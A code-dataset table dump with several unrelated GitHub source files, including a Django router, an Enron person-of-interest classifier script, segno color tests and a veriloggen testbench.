blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2e17765330e011bed1c2dfc615cd74fc673c461d | 6ebee3511ad3ce131341e0a37d04a66f86d0c1fc | /comments/urls.py | 6dc6dd4a2faf8d3c1217de8876b07ea5a72fd611 | [] | no_license | annfr542/ratemyshogun | 25b18d6aaadd7a60f3e25f6cb5709796241a1732 | b2785f16e85175f090724ca6e59512aef5d0ccf0 | refs/heads/master | 2021-01-03T07:47:11.516448 | 2020-02-17T13:15:42 | 2020-02-17T13:15:42 | 239,987,405 | 0 | 0 | null | 2020-02-17T00:04:52 | 2020-02-12T10:39:04 | HTML | UTF-8 | Python | false | false | 280 | py | from django.urls import include, path
from rest_framework import routers
from . import views
# DRF router auto-generates the standard CRUD routes for each registered viewset.
router = routers.DefaultRouter()
router.register(r'comments', views.CommentViewSet)
router.register(r'love', views.LoveViewSet)
# Mount every router-generated URL at the app root.
urlpatterns = [
    path('', include(router.urls)),
]
"git@karlinde.se"
] | git@karlinde.se |
0fd3b3241fcb8a7a9539c91b1e00d1ca84cd191b | e9a33e068f1a60fcef86e1f90eda2f64b52e73c4 | /poi_id.py | eaf912e63defaae9d5f26cc091f5909a62c9c56d | [] | no_license | Tbelaagcakn/Udacity_P7 | b5df34dd20df6220e76dd774df0d5888094d646d | b923c48a5a429463d2841ef94a0202bde97606d7 | refs/heads/master | 2020-03-23T23:06:05.317127 | 2018-07-24T22:01:17 | 2018-07-24T22:01:17 | 142,215,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,606 | py | #!/usr/bin/python
# importer functions
import sys
import pickle
import numpy as np
from sklearn import linear_model
from sklearn import tree
from sklearn.cross_validation import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score, recall_score, precision_score
from sklearn.model_selection import StratifiedShuffleSplit
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from sklearn import cross_validation
from sklearn.feature_selection import SelectKBest, f_classif, chi2
from collections import OrderedDict
### HELPER functions
# functions that help to clean and format the code
def dump_classifier_and_data(clf, dataset, feature_list):
    """Serialise the classifier, dataset and feature list to pickle files.

    Writes three fixed-name files in the current working directory
    ("my_classifier.pkl", "my_dataset.pkl", "my_feature_list.pkl") so the
    grading script can reload them.
    """
    CLF_PICKLE_FILENAME = "my_classifier.pkl"
    DATASET_PICKLE_FILENAME = "my_dataset.pkl"
    FEATURE_LIST_FILENAME = "my_feature_list.pkl"
    # Pickle streams are binary data: open in "wb" -- text mode "w" corrupts
    # the stream on Windows under Python 2 and raises TypeError on Python 3.
    with open(CLF_PICKLE_FILENAME, "wb") as clf_outfile:
        pickle.dump(clf, clf_outfile)
    with open(DATASET_PICKLE_FILENAME, "wb") as dataset_outfile:
        pickle.dump(dataset, dataset_outfile)
    with open(FEATURE_LIST_FILENAME, "wb") as featurelist_outfile:
        pickle.dump(feature_list, featurelist_outfile)
def outlierCleaner(predictions, ages, net_worths):
    """Drop the worst-fitting 3% of points from a regression fit.

    Each argument is a sequence of 1-element sequences (as produced by
    numpy reshape).  Points are ranked by squared residual
    (net_worth - prediction) and the 97% with the smallest residuals are
    kept.

    Returns a list of (age, net_worth, error) tuples, ordered from the
    best fit to the worst kept fit.
    """
    residuals = [nw[0] - pred[0] for pred, nw in zip(predictions, net_worths)]
    # Rank every point by its squared residual; sort is stable, so ties keep
    # their original relative order.
    ranked = sorted(
        ((err * err, age[0], nw[0], err)
         for err, age, nw in zip(residuals, ages, net_worths)),
        key=lambda rec: rec[0])
    keep = int(round(0.97 * len(ranked)))
    return [(age, nw, err) for _, age, nw, err in ranked[:keep]]
"""
A general tool for converting data from the
dictionary format to an (n x k) python list that's
ready for training an sklearn algorithm
    n--no. of key-value pairs in dictionary
k--no. of features being extracted
dictionary keys are names of persons in dataset
dictionary values are dictionaries, where each
key-value pair in the dict is the name
of a feature, and its value for that person
In addition to converting a dictionary to a numpy
array, you may want to separate the labels from the
features--this is what targetFeatureSplit is for
so, if you want to have the poi label as the target,
and the features you want to use are the person's
salary and bonus, here's what you would do:
feature_list = ["poi", "salary", "bonus"]
data_array = featureFormat( data_dictionary, feature_list )
label, features = targetFeatureSplit(data_array)
the line above (targetFeatureSplit) assumes that the
label is the _first_ item in feature_list--very important
that poi is listed first!
"""
def featureFormat(dictionary, features, remove_NaN=True, remove_all_zeroes=True, remove_any_zeroes=False, sort_keys=False):
    """Convert a {person: {feature: value}} dictionary to a numpy array.

    remove_NaN = True converts the string "NaN" to 0.0.
    remove_all_zeroes = True drops rows whose requested features are all 0.
    remove_any_zeroes = True drops rows with any requested feature equal 0.
    sort_keys = True iterates persons in alphabetical order; passing a string
    instead loads a pickled key order from that file (Python 3 compatibility
    shim for the course mini-projects).

    The first feature is assumed to be 'poi' and is excluded from the
    zero-row checks.  Returns None (after printing an error) if a requested
    feature is missing.
    """
    # Resolve the iteration order over persons.
    if isinstance(sort_keys, str):
        import pickle
        keys = pickle.load(open(sort_keys, "rb"))
    elif sort_keys:
        keys = sorted(dictionary.keys())
    else:
        keys = dictionary.keys()

    rows = []
    for key in keys:
        row = []
        for feature in features:
            try:
                value = dictionary[key][feature]
            except KeyError:
                print( "error: key ", feature, " not present")
                return
            if remove_NaN and value == "NaN":
                value = 0
            row.append(float(value))

        # 'poi' is the label, not a feature: exclude it from the zero checks.
        checked = row[1:] if features[0] == 'poi' else row

        keep = True
        if remove_all_zeroes:
            keep = any(item != 0 and item != "NaN" for item in checked)
        if remove_any_zeroes and (0 in checked or "NaN" in checked):
            keep = False
        if keep:
            rows.append(np.array(row))

    return np.array(rows)
def targetFeatureSplit(data):
    """Split featureFormat output into labels and features.

    The first column of each row (assumed to be the prediction target,
    e.g. 'poi') goes into one list, the remaining columns into another.
    Returns (target, features) as two parallel lists; sklearn accepts both
    plain lists and numpy arrays.
    """
    target = [row[0] for row in data]
    features = [row[1:] for row in data]
    return target, features
### Task 1: Select what features you'll use.
### features_list is a list of strings, each of which is a feature name.
### The first feature must be "poi".
# this is the initial list of data to explore (not final!)
features_list = ['poi','salary','bonus','exercised_stock_options','from_messages','from_poi_to_this_person',
                 'from_this_person_to_poi','deferred_income'] # You will need to use more features
### Load the dictionary containing the dataset
# NOTE(review): text mode "r" only works for this pickle under Python 2 (this
# script uses Python 2 print statements throughout); "rb" would be safer.
with open("final_project_dataset.pkl", "r",) as data_file:
    data_dict = pickle.load(data_file)
# Take out total option (from outlier section below): the spreadsheet 'TOTAL'
# row is an aggregate, not a person.
data_dict.pop('TOTAL')
# Create lists for use in basic analysis
names, Salary, Bonus, ESO, FEmails, FromPOI, POI, DefInc = [], [], [], [], [], [], [], []
count_nan, count_all = 0, 0
# counting the total data points, POI and number of NaNs
for person, data in data_dict.iteritems():  # .iteritems() => Python 2 only
    names.append(person)
    for key, value in data.iteritems():
        count_all += 1
        if value == 'NaN':
            count_nan = count_nan + 1
# Collect per-person values of candidate features; float('NaN') yields nan
# rather than raising, so missing values become nan here.
for name in names:
    POI.append(int(data_dict[name]['poi']))
    Salary.append(float(data_dict[name]['salary']))
    Bonus.append(float(data_dict[name]['bonus']))
    ESO.append(float(data_dict[name]['exercised_stock_options']))
    DefInc.append(float(data_dict[name]['deferred_income']))
    FromPOI.append(float(data_dict[name]['from_poi_to_this_person']))
    FEmails.append(float(data_dict[name]['from_messages']))
print 'Total People: ' + str(len(names))
print 'Total POI: ' + str(sum(POI))
print 'Total Data Points: ' + str(count_all)
print 'Total NaN: ' + str(count_nan)
### Task 2: Remove outliers
# first look at the data we have and where the POIs are to see if there
# are any obvious outliers (for eg TOTAL); POIs are drawn in red on top of
# the green scatter of everyone.
plt.scatter(Salary, Bonus, color='green')
for i, value in enumerate(POI):
    if POI[i] ==1:
        plt.scatter(Salary[i], Bonus[i], color = 'red')
plt.show()
plt.scatter(FEmails, FromPOI, color='green')
for i, value in enumerate(POI):
    if POI[i] ==1:
        plt.scatter(FEmails[i], FromPOI[i], color = 'red')
plt.show()
# shape data for linear regression model for testing if removing outliers is effective
# NOTE(review): despite its name, `poi` below holds salaries (the regression
# target), not the POI labels -- confirm before reusing the variable.
eso = np.nan_to_num(np.reshape((np.array(ESO)), (len(ESO), 1)))
poi = np.nan_to_num(np.reshape((np.array(Salary)), (len(Salary), 1)))
eso_train, eso_test, poi_train, poi_test = train_test_split(eso, poi, test_size=0.2, random_state=15)
reg = linear_model.LinearRegression()
reg.fit(eso_train, poi_train)
print('Regression Score Pre-Clean: ' + str(reg.score(eso_test, poi_test)))
try:
    plt.plot(eso, reg.predict(eso), color="blue")
except NameError:
    pass
plt.scatter(eso, poi)
plt.show()
### identify and remove the most outlier-y points (worst 3% of residuals)
cleaned_data = []
try:
    predictions = reg.predict(eso_train)
    cleaned_data = outlierCleaner( predictions, eso_train, poi_train )
except NameError:
    print( "your regression object doesn't exist, or isn't name reg")
    print( "can't make predictions to use in identifying outliers")
### only run this code if cleaned_data is returning data
if len(cleaned_data) > 0:
    eso, poi, errors = zip(*cleaned_data)
    eso = np.reshape( np.array(eso), (len(eso), 1))
    poi = np.reshape( np.array(poi), (len(poi), 1))
    ### refit your cleaned data!
    try:
        reg.fit(eso, poi)
        print 'Regression Score Post Clean: ' + str(reg.score(eso_test, poi_test))
        plt.plot(eso, reg.predict(eso), color="blue")
    except NameError:
        print( "you don't seem to have regression imported/created")
        print( " or else your regression object isn't named reg")
        print( " either way, only draw the scatter plot of the cleaned data")
    plt.scatter(eso, poi)
    plt.xlabel("eso")
    plt.ylabel("poi")
    #plt.show()
else:
    print( "outlierCleaner() is returning an empty list, no refitting to be done")
### Task 3: Create new feature(s)
### Store to my_dataset for easy export below.
# create np arrays for the rescaler (NaN -> 0 so MinMaxScaler can fit)
salary = np.nan_to_num(np.reshape((np.array(Salary)), (len(Salary), 1)))
bonus = np.nan_to_num(np.reshape((np.array(Bonus)), (len(Bonus), 1)))
eso = np.nan_to_num(np.reshape((np.array(ESO)), (len(ESO), 1)))
# rescale salary, bonus and exercised stock options into [0, 1]
scaler = MinMaxScaler()
scaled = scaler.fit(salary)
scaled_salary = scaled.transform(salary)
scaled = scaler.fit(bonus)
scaled_bonus = scaled.transform(bonus)
scaled = scaler.fit(eso)
scaled_eso = scaled.transform(eso)
# append data_dict with rescaled values and create new
# value for the percent of emails received from POI
count = 0
for name in names:
    data_dict[name]['salary'] = scaled_salary[count][0]
    data_dict[name]['bonus'] = scaled_bonus[count][0]
    data_dict[name]['exercised_stock_options'] = scaled_eso[count][0]
    count = count + 1
# NOTE(review): the next statement sits OUTSIDE the loop above, so only the
# last person in `names` receives the engineered feature; it is also absent
# from the `features` list below, so it is never used -- confirm intent.
data_dict[name]['Percent_Emails_from_POI'] = float(data_dict[name]['from_poi_to_this_person'])/float(data_dict[name]['from_messages'])
features = ['poi','salary', 'deferral_payments', 'total_payments', 'loan_advances', 'bonus',
            'restricted_stock_deferred', 'deferred_income', 'total_stock_value', 'expenses',
            'exercised_stock_options', 'other', 'long_term_incentive', 'restricted_stock',
            'director_fees','to_messages', 'from_poi_to_this_person', 'from_messages',
            'from_this_person_to_poi', 'shared_receipt_with_poi']
data = featureFormat(data_dict, features)
# separating the poi labels from rest of data
features_list = []
poi = []
for point in data:
    poi.append(point[0])
    features_list.append(point[1:])
# creating a split data set for use in selector - using train_test_split for simplicity
features_train, features_test, labels_train, labels_test = cross_validation.train_test_split(features_list, poi, test_size=0.3, random_state=42)
# Run selector to get a score of effect for each feature
selector = SelectKBest(f_classif, k=5)
selector.fit(features_train, labels_train)
features_train = selector.transform(features_train)
features_test = selector.transform(features_test)
# create a dictionary of the top scores; keep features whose ANOVA F-score > 2
scores = selector.scores_
scores_dict = {}
scores_top_dict = {}
count = 0
for_using_features = []
for feature in features:
    if feature == 'poi':
        pass
    else:
        scores_dict[feature]=scores[count]
        if scores[count] > 2:
            scores_top_dict[feature] = scores[count]
            for_using_features.append(feature)
        count = count + 1
print(scores_top_dict)
# create new dataset with only the selected top features
new_data_dict = OrderedDict()
# NOTE(review): `names` was already fully populated above, so this loop
# appends every person a second time and the loop below revisits each person
# twice (harmless for dict assignment, but redundant).
for person in data_dict:
    names.append(person)
for name in names:
    new_data_dict[name]=OrderedDict()
    new_data_dict[name]['poi']=data_dict[name]['poi']
    for feat in for_using_features:
        new_data_dict[name][feat] = data_dict[name][feat]
my_dataset = new_data_dict
new_features_list = ['poi']
for feat in for_using_features:
    new_features_list.append(feat)
### Extract features and labels from dataset for local testing
data = featureFormat(my_dataset, new_features_list, sort_keys = True)
labels, features = targetFeatureSplit(data)
features_train, features_test, labels_train, labels_test = cross_validation.train_test_split(features, labels, test_size=0.4, random_state=42)
### Task 4: Try a variety of classifiers
### Please name your classifier clf for easy export below.
### Note that if you want to do PCA or other multi-stage operations,
### you'll need to use Pipelines. For more info:
### http://scikit-learn.org/stable/modules/pipeline.html
# Each candidate is fit on the training split and scored on the held-out
# split with accuracy, recall and precision.
# trying decision tree
clf = tree.DecisionTreeClassifier()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'TREE RECALL:' + str(recall)
print 'TREE PRECISION:' + str(prec)
print 'DECISION TREE ACCURACY: ' + str(accuracy)
# trying random forest
clf = RandomForestClassifier()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST RECALL:' + str(recall)
print 'RANDOM FOREST PRECISION:' + str(prec)
print 'RANDOM FOREST ACCRAUCY:' + str(accuracy)
# trying SVM
clf = SVC()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'SVM RECALL:' + str(recall)
print 'SVM PRECISION:' + str(prec)
print 'SVM ACCURACY: '+str(accuracy)
# Trying Naive Bayes
clf = GaussianNB()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'Naive Bayes RECALL:' + str(recall)
print 'Naive Bayes PRECISION:' + str(prec)
print 'Naive Bayes ACCURACY: '+str(accuracy)
### Task 5: Tune your classifier to achieve better than .3 precision and recall
### using our testing script. Check the tester.py script in the final project
### folder for details on the evaluation method, especially the test_classifier
### function.
# I spent some time trying to tune the Random Forest Classifier before settling
# on the Gaussian Naive Bayes, so I have left the code here as an example of tuning,
# given the Gaussian Naive Bayes did not require it.
# Iteration 1 - I ran the code multiple times varying the n_estimators
clf = RandomForestClassifier(n_estimators=200)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST improved RECALL:' + str(recall)
print 'RANDOM FOREST improved PRECISION:' + str(prec)
# Iteration 2 - switch the split-quality criterion from gini to entropy
clf = RandomForestClassifier(criterion = 'entropy')
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST improved RECALL:' + str(recall)
print 'RANDOM FOREST improved PRECISION:' + str(prec)
# Iteration 3 - I ran the code multiple times varying the max_depth
clf = RandomForestClassifier(max_depth = 20)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST improved RECALL:' + str(recall)
print 'RANDOM FOREST improved PRECISION:' + str(prec)
# Iteration 4 - I ran the code multiple times varying the min_samples_split
clf = RandomForestClassifier(min_samples_split = 4)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST improved RECALL:' + str(recall)
print 'RANDOM FOREST improved PRECISION:' + str(prec)
# Iteration 5 - I ran the code multiple times with different combinations of the above parameters
clf = RandomForestClassifier(n_estimators = 1000, oob_score = True, random_state = 30)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST RECALL:' + str(recall)
print 'RANDOM FOREST PRECISION:' + str(prec)
# Validation with Stratified Shuffle Split: rebuild train/test splits so the
# POI/non-POI class balance is preserved in each fold.
# NOTE(review): with n_splits=3 the three folds' samples are concatenated into
# single train/test lists, so examples can repeat across folds -- confirm this
# pooling is intended.
features_train, features_test, labels_train, labels_test = [],[],[],[]
sss = StratifiedShuffleSplit(n_splits = 3, test_size = 0.5, random_state = 15)
for train_indices, test_indices in sss.split(features, labels):
    for i in train_indices:
        features_train.append(features[i])
        labels_train.append(labels[i])
    for i in test_indices:
        features_test.append(features[i])
        labels_test.append(labels[i])
# final algorithm! (typos such as 'ACCRAUCY' are in runtime strings and are
# left untouched here)
clf2 = GaussianNB()
clf2.fit(features_train, labels_train)
pred = clf2.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'GNB improved SSS ACCRAUCY:' + str(accuracy)
print 'GNB improved SSS RECALL:' + str(recall)
print 'GNB improved SSS PRECISION:' + str(prec)
### Task 6: Dump your classifier, dataset, and features_list so anyone can
### check your results. You do not need to change anything below, but make sure
### that the version of poi_id.py that you submit can be run on its own and
### generates the necessary .pkl files for validating your results.
dump_classifier_and_data(clf2, my_dataset, new_features_list)
| [
"butterworth.teagan@gmail.com"
] | butterworth.teagan@gmail.com |
c420d7a9fc7816087de4262d2731b0d42e2d9e96 | 770710253983911ea0ed00cb3111f2d3fbadd200 | /Functions/Notes.py | 9bfbd8381c561a79989c37f78497bfe0be88ee97 | [] | no_license | anshdholakia/Full-Voice-Assistant-Application | 4185ec88ed50f7477853bbf75905708dc3bb5c6d | c0b88aaece48c2aac4e159f5f7772e1df4c7dd1c | refs/heads/main | 2023-05-27T16:38:31.500721 | 2021-06-14T20:43:48 | 2021-06-14T20:43:48 | 376,944,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | import subprocess as sp
# Launch Windows Notepad on the notes file without blocking: sp.Popen returns
# immediately (Windows-only, relies on Notepad.exe being on PATH).
programname = 'Notepad.exe'
filename = 'Mynotes.txt'
sp.Popen([programname,filename])
| [
"anshhiro.dholakia@gmail.com"
] | anshhiro.dholakia@gmail.com |
a0df9ac05e88fad95bd93a42f58be9a0d2994745 | 35b45b5225f911072287b7f0888f4ef4cc70f3d9 | /tests/test_colors.py | 4b316eecdba5bf03008b0ff14ef89c60f50cc7d2 | [
"BSD-3-Clause"
] | permissive | heuer/segno | 54e9b583dbc33b016715bb13f97a9013a37cc9d4 | 11556378fa8949fa5ad6dddbf8cc5f4a667038af | refs/heads/master | 2023-06-21T02:01:45.620206 | 2023-05-02T22:09:31 | 2023-05-02T22:09:31 | 64,920,252 | 441 | 59 | BSD-3-Clause | 2023-06-15T05:00:05 | 2016-08-04T09:08:52 | Python | UTF-8 | Python | false | false | 8,562 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 - 2022 -- Lars Heuer
# All rights reserved.
#
# License: BSD License
#
"""\
Tests against the colors module.
"""
from __future__ import absolute_import, unicode_literals
import pytest
from segno import writers as colors
def test_illegal():
    # An unknown color name must be rejected with ValueError.
    with pytest.raises(ValueError):
        colors._color_to_rgb('unknown')
def test_illegal2():
    # An alpha component above 255 is out of range.
    with pytest.raises(ValueError):
        colors._color_to_rgb((1, 2, 3, 256))
def test_illegal3():
    # All RGB components above 255 are out of range.
    with pytest.raises(ValueError):
        colors._color_to_rgb((300, 300, 300))
def test_illegal4():
    # A single out-of-range blue component must be rejected.
    with pytest.raises(ValueError):
        colors._color_to_rgb((0, 0, 256))
def test_illegal5():
    # A single out-of-range red component must be rejected.
    with pytest.raises(ValueError):
        colors._color_to_rgb((256, 0, 0))
def test_rgba_vs_rgb_conflict():
    # An 8-digit hex value carries alpha, so the RGB-only parser must refuse it.
    with pytest.raises(ValueError):
        colors._color_to_rgb('#949494E8')
@pytest.mark.parametrize('clr, expected', [((0, 0, 0, 0), False),
                                           ((0, 0, 0, 1), True),
                                           ((0, 0, 0, 1.0), True),
                                           ((0, 0, 0, 255), True),
                                           ((0, 0, 0, 0.25), False),
                                           ('#000', True),
                                           ('#000000', True),
                                           ('Black', True),
                                           ('black', True),
                                           ('BLACK', True),
                                           ('blacK', True),
                                           ])
def test_color_is_black(clr, expected):
    # True only for fully-opaque black, in any supported notation/casing.
    assert expected == colors._color_is_black(clr)
@pytest.mark.parametrize('clr, expected', (((255, 255, 255, 0), False),
                                           ((255, 255, 255, 1), True),
                                           ((255, 255, 255, 255), True),
                                           ((255, 255, 255, 1.0), True),
                                           ((255, 255, 255, .0), False),
                                           ((255, 255, 255, .25), False),
                                           ('#FFF', True),
                                           ('#fFF', True),
                                           ('#ffF', True),
                                           ('#fff', True),
                                           ('#ffffff', True),
                                           ('White', True),
                                           ('white', True),
                                           ('WHITE', True),
                                           ('whitE', True),
                                           ))
def test_color_is_white(clr, expected):
    # True only for fully-opaque white, in any supported notation/casing.
    assert expected == colors._color_is_white(clr)
@pytest.mark.parametrize('clr, expected', (('black', '#000'),
                                           ('WHite', '#fff'),
                                           ('#000000', '#000'),
                                           ('#ffFFff', '#fff'),
                                           ('#EEeeEE', '#eee'),
                                           ('#F00', 'red'),
                                           ('#FF0000', 'red'),
                                           ('red', 'red'),
                                           ('#d2b48c', 'tan'),
                                           ('tan', 'tan'),
                                           ((0, 0, 0, 1.0), '#000'),
                                           ((255, 255, 255, 1.0), '#fff'),
                                           ((255, 0, 0, 0.25), 'rgba(255,0,0,0.25)'),
                                           ('#0000ffcc', 'rgba(0,0,255,0.8)'),
                                           ('#949494E8', 'rgba(148,148,148,0.91)'),
                                           ))
def test_color_to_webcolor(clr, expected):
    # Conversion picks the shortest web representation (short hex / CSS
    # name), falling back to rgba() when the color carries alpha.
    assert expected == colors._color_to_webcolor(clr)
@pytest.mark.parametrize('clr, expected', (('black', '#000'),
                                           ('#F00', '#ff0000'),
                                           ('#FF0000', '#ff0000'),
                                           ('red', '#ff0000'),
                                           ('#D2B48C', '#d2b48c'),
                                           ((0, 0, 0, 1.0), '#000'),
                                           ((255, 255, 255, 1.0), '#fff'),
                                           ))
def test_color_to_webcolor_dont_optimize(clr, expected):
    # With optimize=False the full hex form is kept instead of a CSS name.
    assert expected == colors._color_to_webcolor(clr, optimize=False)
def _make_valid_colornames_data():
    """Yield (color name, expected RGB) pairs in several capitalizations."""
    data = (
        ('red', (255, 0, 0)),
        ('green', (0, 128, 0)),
        ('blue', (0, 0, 255)),
        ('Fuchsia', (255, 0, 255)),
        ('CoRnFloWeRblUe', (100, 149, 237)),
        ('hOtPink', (255, 105, 180)),
        ('darkSlateGrey', (47, 79, 79)),
    )
    for name, expected in data:
        for variant in (name, name.title(), name.upper(), name.lower()):
            yield variant, expected
@pytest.mark.parametrize('name, expected', _make_valid_colornames_data())
def test_valid_colornames(name, expected):
    # Every CSS color name must resolve to its 3-tuple RGB value,
    # case-insensitively.
    rgb = colors._color_to_rgb(name)
    assert 3 == len(rgb)
    assert expected == rgb
@pytest.mark.parametrize('color, expected', (('#fff', (255, 255, 255)),
                                             ('#0000ffcc', (0, 0, 255, .8)),
                                             ('#949494E8', (148, 148, 148, 0.91)),
                                             ))
def test_hex_to_rgba(color, expected):
    # 8-digit hex yields an RGBA tuple with a float alpha; 3-digit stays RGB.
    assert expected == colors._hex_to_rgb_or_rgba(color)
@pytest.mark.parametrize('color, expected', (('#fff', (255, 255, 255)),
                                             ('#0000ffcc', (0, 0, 255, 204)),
                                             ('#949494E8', (148, 148, 148, 232)),
                                             ))
def test_hex_to_rgba_alpha_int(color, expected):
    # With alpha_float=False the alpha channel is reported as 0..255.
    assert expected == colors._hex_to_rgb_or_rgba(color, alpha_float=False)
def _make_valid_hexcodes_rgb_data():
    """Yield (hex code, expected RGB) pairs in several capitalizations."""
    data = (
        ('#000', (0, 0, 0)),
        ('#FF1493', (255, 20, 147)),
        ('#FA8072', (250, 128, 114)),
        ('00F', (0, 0, 255)),
        ('#800000', (128, 0, 0)),
        ('#812dd3', (129, 45, 211)),
    )
    for name, expected in data:
        for variant in (name, name.title(), name.upper(), name.lower()):
            yield variant, expected
@pytest.mark.parametrize('name, expected', _make_valid_hexcodes_rgb_data())
def test_valid_hexcodes_rgb(name, expected):
    # Hex codes (with or without '#', any casing) must resolve to RGB.
    rgb = colors._color_to_rgb(name)
    assert 3 == len(rgb)
    assert expected == rgb
def _make_valid_hexcodes_rgba_data():
    """Yield (color, expected RGBA) pairs in several capitalizations."""
    data = (
        ('#808000', (128, 128, 0, 1.0)),
        ('red', (255, 0, 0, 1.0)),
    )
    for name, expected in data:
        for variant in (name, name.title(), name.upper(), name.lower()):
            yield variant, expected
@pytest.mark.parametrize('name, expected', _make_valid_hexcodes_rgba_data())
def test_valid_hexcodes_rgba(name, expected):
    # Opaque inputs gain an explicit alpha of 1.0 in the RGBA form.
    rgba = colors._color_to_rgba(name)
    assert 4 == len(rgba)
    assert expected == rgba
@pytest.mark.parametrize('t, expected', (
        ('#808000', (128, 128, 0, 1.0)),
        ('red', (255, 0, 0, 1.0)),
        ((255, 0, 0, .2), (255, 0, 0, .2)),
))
def test_tuple_to_rgba(t, expected):
    # An existing float alpha is preserved; opaque inputs get alpha 1.0.
    rgba = colors._color_to_rgba(t)
    assert expected == rgba
@pytest.mark.parametrize('t, expected', (
        ('#808000', (128, 128, 0, 255)),
        ('red', (255, 0, 0, 255)),
        ((0, 0, 255, .8), (0, 0, 255, 204)),
))
def test_tuple_to_rgba_int(t, expected):
    # With alpha_float=False a float alpha is converted to the 0..255 scale.
    rgba = colors._color_to_rgba(t, alpha_float=False)
    assert expected == rgba
@pytest.mark.parametrize('color, expected', (
        ((0, 0, 0), (255, 255, 255)),
        ((255, 255, 255), (0, 0, 0)),
        ((123, 123, 123), (132, 132, 132)),
        ((60, 70, 80), (195, 185, 175)),
))
def test_invert_color(color, expected):
    # Inversion maps each channel c to 255 - c.
    assert expected == colors._invert_color(color)
if __name__ == '__main__':
    # Allow running this test module directly without a pytest invocation.
    pytest.main([__file__])
| [
"heuer@semagia.com"
] | heuer@semagia.com |
1b90c28e59e5d4a5998f4d6c2027b2eacdd7467f | 1d9356626550004745bbc14de9a3308753afcea5 | /sample/tests/while/led.py | 2d6f9c7e92fa414d08993efca62d0115951efe0e | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | hoangt/veriloggen | e916290aa15c63f03ec0ad8e9c8bdf183787fbe9 | 8e7bd1ff664a6d683c3b7b31084ff4d961c4c841 | refs/heads/master | 2021-01-14T12:01:03.686270 | 2015-09-18T06:49:20 | 2015-09-18T06:49:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | import sys
import os
from veriloggen import *
def mkTest():
    """Build and return a veriloggen 'test' Module (a simple testbench).

    The module dumps VCD waves to 'uut.vcd', toggles CLK every 5 time units,
    pulses RST (0 -> 1 -> 0), then increments a 32-bit counter once per
    rising clock edge until it reaches 1024 and calls $finish.
    """
    m = Module('test')
    clk = m.Reg('CLK')
    rst = m.Reg('RST')
    count = m.Reg('count', width=32)
    # Wave dumping: record CLK, RST and count into uut.vcd.
    m.Initial(
        Systask('dumpfile', 'uut.vcd'),
        Systask('dumpvars', 0, clk, rst, count),
    )
    # Free-running clock.
    m.Initial(
        clk(0),
        Forever(clk(Not(clk), ldelay=5)) # forever #5 CLK = ~CLK;
    )
    # Reset pulse, then the counting loop and simulation shutdown.
    m.Initial(
        rst(0),
        Delay(100),
        rst(1),
        Delay(100),
        rst(0),
        Delay(1000),
        count(0),
        While(count < 1024)(
            count( count + 1 ),
            Event(Posedge(clk))
        ),
        Systask('finish'),
    )
    return m
if __name__ == '__main__':
    # Build the testbench, write its Verilog to tmp.v, and echo the source.
    test = mkTest()
    verilog = test.to_verilog('tmp.v')
    print(verilog)
| [
"shta.ky1018@gmail.com"
] | shta.ky1018@gmail.com |
